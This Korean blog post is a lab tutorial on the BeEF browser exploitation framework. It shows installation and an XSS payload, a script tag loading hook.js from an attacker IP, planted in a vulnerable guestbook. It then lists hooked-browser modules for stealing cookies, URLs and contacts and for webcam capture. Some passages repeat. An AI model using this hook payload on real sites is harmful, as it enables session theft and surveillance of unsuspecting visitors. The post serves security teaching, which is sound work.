반응형
ி BeEF(Browser Exploitation Framework)
BeEF는
"hook.js"
라는 후킹을 위한 JavaScript 파일을 가지고 있으며, 피해자가 취약한 웹 페이지에서 해당 파일을 실행하면 BeEF 서버에 의해 악의적인 명령이 실행될 수 있다.
ி BeEF 설치
# cd beef; ./install
# vi beef/config.yaml
beef는 Default passwd 사용을 제한하고 있으니
config.yaml에서 다른 password로 변경한다.
BeEF 접속 주소는 127.0.0.1:3000/ui/panel이다.
# ./beefி BeEF Browser Hooking
<script src="http://192.168.111.132:3000/hook.js"></script>
공격자(.132)는 XSS가 동작하는 취약한 홈페이지의 방명록에 후킹 스크립트를 삽입하였다.
피해자는 방명록에 들어오면 저 스크립트가 실행되면서 브라우저가 hooking된다.
공격자는 BeEF에서 접속한 피해자의 정보를 바로 확인할 수 있다.
피해자는 방명록에 들어오면 저 스크립트가 실행되면서 브라우저가 hooking된다.
공격자는 BeEF에서 접속한 피해자의 정보를 바로 확인할 수 있다.
.134는 후킹 스크립트가 삽입된 취약한 방명록 서버, 138은 피해자이다.
이제 피해자의 브라우저를 연결 했으므로 수 많은 BeEF의 명령을 사용할 수 있다.
아래는 몇 가지 예시이다.
➽ 방문한 도메인 획득
➽ 쿠키 획득
➽ 웹캠
➽ 스크린샷
➽ 방문한 URL 획득
➽ Google 주소록 획득
➽ 소리 재생
사용하는 방법은 Module Tree에서 원하는 모듈을 선택하고 실행 버튼을 누르면 된다.
아래는 몇 가지 예시이다.
➽ 방문한 도메인 획득
➽ 쿠키 획득
➽ 웹캠
➽ 스크린샷
➽ 방문한 URL 획득
➽ Google 주소록 획득
➽ 소리 재생
사용하는 방법은 Module Tree에서 원하는 모듈을 선택하고 실행 버튼을 누르면 된다.
"소리 재생"
명령은 피해자의 브라우저에 내가 지정한 사운드 파일을 재생시킨다. "웹캠"
명령을 사용하면 Hooked 된 브라우저에게 먼저 Adobe Flash 사용 요청을 보낸다. 이때 "허용"을 하면 피해자의 모습이 보이게 된다.
이외에도 수 많은 모듈이 있는데 다 언급하지는 않겠다.
이러한 웹 브라우저를 이용한 취약점 공격은 가상머신 안에서 모두 시연한 것이니
부디 엉뚱한 시스템에다 하지 않기를 바랍니다.
반응형
'해킹-보안' 카테고리의 다른 글
파일 업로드/다운로드 취약점 공격 (0) | 2020.07.05 |
---|---|
버프스위트(Burpsuite) 설치 및 환경설정 (0) | 2020.07.05 |
setoolkit을 이용하여 피싱 사이트 만들기 (2) | 2020.07.04 |
Blind SQL Injection 공격 시연 (0) | 2020.07.02 |
Union SQL Injection 공격 시연 (0) | 2020.07.02 |